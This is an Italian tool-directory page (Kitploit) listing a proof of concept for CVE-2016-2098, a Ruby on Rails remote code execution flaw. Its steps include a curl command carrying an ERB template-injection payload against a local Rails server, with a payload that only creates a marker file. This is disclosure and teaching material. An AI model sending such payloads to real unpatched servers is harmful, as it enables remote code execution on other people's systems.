Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
dh-CVE_2016_2098 — Prova di concetto che mostra come CVE-2016-2098 porti all'esecuzione remota di codice. | Kitploit
Strumenti/GitHubGitHub/hderms/dh-cve_2016_2098
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubhderms/dh-cve_2016_2098

dh-CVE_2016_2098

Prova di concetto che mostra come CVE-2016-2098 porti all'esecuzione remota di codice.

Vedi Repository
3410 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Proof of concept per https://groups.google.com/forum/#!topic/rubyonrails-security/ly-IH-fxr_Q

Sfruttamento:

  1. Dovresti avviare il server Rails solo in un modo che sia certo non ti esporrà a essere sfruttato
  2. Esegui rails s
  3. Esegui il seguente comando curl -v -H "Accept: application/json" -H "Content-type: application/json" -X GET -d ' {"id" : { "inline" : "<%= FileUtils.touch \"rooted\"%>"}}' http://localhost:3000/exploits
  4. Verifica che il file "rooted" ora esista nella directory del progetto
Scarica lo strumento